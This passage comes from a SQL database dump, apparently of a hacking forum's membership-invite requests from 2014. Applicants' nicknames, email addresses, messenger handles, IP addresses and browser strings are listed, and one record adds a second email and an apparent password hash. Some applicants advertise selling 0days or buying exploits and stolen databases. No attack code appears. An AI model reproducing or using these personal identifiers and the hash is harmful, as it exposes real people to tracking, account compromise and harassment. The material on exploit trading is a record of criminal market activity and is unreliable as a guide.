601082570\n[b]e-mail[/b]: scrack96@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.150.12.94\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/ScrackCartoons | https://twitter.com/ScrackCartoons \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1639, 1472, 0, 'Invite', 2, '{$name}', 1408255415, '[SIZE=\'4\'][COLOR=\'Sienna\']sash[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: sasha.raaad@gmail.com\n[b]Info[/b]: i have years of penetration testing , reverse engineering and exploit development i don\'t usually play in forums cuz i\'m getting old , also i have a lot of connections for selling the 0days if they are fresh and real and so it with be beneficial \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 125.27.44.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : sash : alexandr-nosov@yandex.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://sash.net | sash.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1640, 1473, 0, 'Invite', 2, '{$name}', 1408261167, '[SIZE=\'4\'][COLOR=\'Sienna\']delta12[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: delta12@exploit.im\n[b]e-mail[/b]: cdwin@ymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.242.236.190\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/delta12 | https://twitter.com/hashtag/delta12 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1641, 1474, 0, 'Invite', 2, '{$name}', 1408263637, '[SIZE=\'4\'][COLOR=\'Sienna\']pappettee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 111000724\n[b]e-mail[/b]: lannnser@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.7.139.197\n[*][b]real ip[/b]: 50.7.139.197\n[*][b]User agent[/b]: \n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Sistiana/status/153968518365327360 | https://twitter.com/Sistiana/status/153968518365327360 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1642, 1475, 0, 'Invite', 2, '{$name}', 1408263662, '[SIZE=\'4\'][COLOR=\'Sienna\']pappettee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 111000724\n[b]e-mail[/b]: lannnser@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.7.139.197\n[*][b]real ip[/b]: 50.7.139.197\n[*][b]User agent[/b]: \n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Sistiana/status/153968518365327360 | https://twitter.com/Sistiana/status/153968518365327360 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1643, 1476, 0, 'Invite', 2, '{$name}', 1408270799, '[SIZE=\'4\'][COLOR=\'Sienna\']johnnyb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: johnnyb@exploit.im\n[b]e-mail[/b]: johnnybw0rm22@mailinator.com\n[b]Info[/b]: i am buyer of exploits and DBs. Member of many forum like exploit.im.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 111.90.159.40\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://johnnyb.ie | johnnyb.ie \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1644, 1477, 0, 'Invite', 2, '{$name}', 1408270823, '[SIZE=\'4\'][COLOR=\'Sienna\']geciciuser[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: geciciuser@ccc.de\n[b]e-mail[/b]: geciciuser@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.122.19.54\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://geciciuser.ya.ru | geciciuser.ya.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1645, 1478, 0, 'Invite', 2, '{$name}', 1408272563, '[SIZE=\'4\'][COLOR=\'Sienna\']shark-php[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sh4rkx@jabber.net\n[b]e-mail[/b]: shark-php@live.ca\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.158.180.41\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1646, 1479, 0, 'Invite', 2, '{$name}', 1408273831, '[SIZE=\'4\'][COLOR=\'Sienna\']g3sh3r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: g3sh3r@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.205.155.144\n[*][b]real ip[/b]: 91.205.155.144\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://g3sh3r.yingwa.com.cn | g3sh3r.yingwa.com.cn \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1647, 1480, 0, 'Invite', 2, '{$name}', 1408274221, '[SIZE=\'4\'][COLOR=\'Sienna\']d3sp0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d3sp0s@exploit.in\n[b]e-mail[/b]: d3sp0s@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2040.25 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.projectanarchy.com/cn/users/d3sp0s | http://www.projectanarchy.com/cn/users/d3sp0s \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1648, 1481, 0, 'Invite', 2, '{$name}', 1408276953, '[SIZE=\'4\'][COLOR=\'Sienna\']vjhgffh[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: DGFDG@FSFDSFSD.COM\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.65.58.169\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://okkarohd.blogspot.com/2011_11_01_archive.html | http://okkarohd.blogspot.com/2011_11_01_archive.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1651, 1482, 0, 'Invite', 2, '{$name}', 1408302422, '[SIZE=\'4\'][COLOR=\'Sienna\']shift[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: shiftreduce@gmail.com\n[b]e-mail[/b]: shiftreduce@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.66.57.168\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://shift.com.au | shift.com.au \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1652, 1483, 0, 'Invite', 2, '{$name}', 1408302782, '[SIZE=\'4\'][COLOR=\'Sienna\']softer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: logosdelrjr@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.234.31.10\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/asofterworld | http://vk.com/asofterworld \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1653, 1484, 0, 'Invite', 2, '{$name}', 1408306989, '[SIZE=\'4\'][COLOR=\'Sienna\']Tarsius[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: tarsius@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.116.85.109\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://tarsius.d3.ru | tarsius.d3.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1654, 1485, 0, 'Invite', 2, '{$name}', 1408308100, '[SIZE=\'4\'][COLOR=\'Sienna\']Me5145[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: notme1945@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 125.165.186.131\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/ken-b.../6173448523/ | https://www.flickr.com/photos/ken-b.../6173448523/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1656, 1486, 0, 'Invite', 2, '{$name}', 1408317993, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr_AnarShi-T[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.27.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html | http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1657, 1487, 0, 'Invite', 2, '{$name}', 1408329427, '[SIZE=\'4\'][COLOR=\'Sienna\']Veki[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: silverspid3r@gmail.com\n[b]Info[/b]: Interested in security and cryptography, worked with few languages and programming since 7 years ago. Main goal is to study cryptography and learn more about it. Already have a project which earned me a gold medal for inovation with security + IT (it had to do something with webcams + infrared light, but I got a new idea which I will add to and expand that project).\r\nKnown languages: C#, C++, Java, Python and Basic\r\nMain goal: Learn more about security and become a web developer\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.207.45.214\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://veki.hu | veki.hu \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1659, 1425, 1574, 'lumbricus', 39, '', 1408351743, 'Where are all the web app dudes? Is this palce full of script kiddies?', 1, 0, '', 0, 1, 0, 0, 0), (1660, 1488, 0, 'Invite', 2, '{$name}', 1408353118, '[SIZE=\'4\'][COLOR=\'Sienna\']marketisdisabled[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 12331123\n[b]e-mail[/b]: marketisdisabled@marketisdisabled.com\n[b]Info[/b]: marketisdisabled\r\nmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabledmarketisdisabled\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request 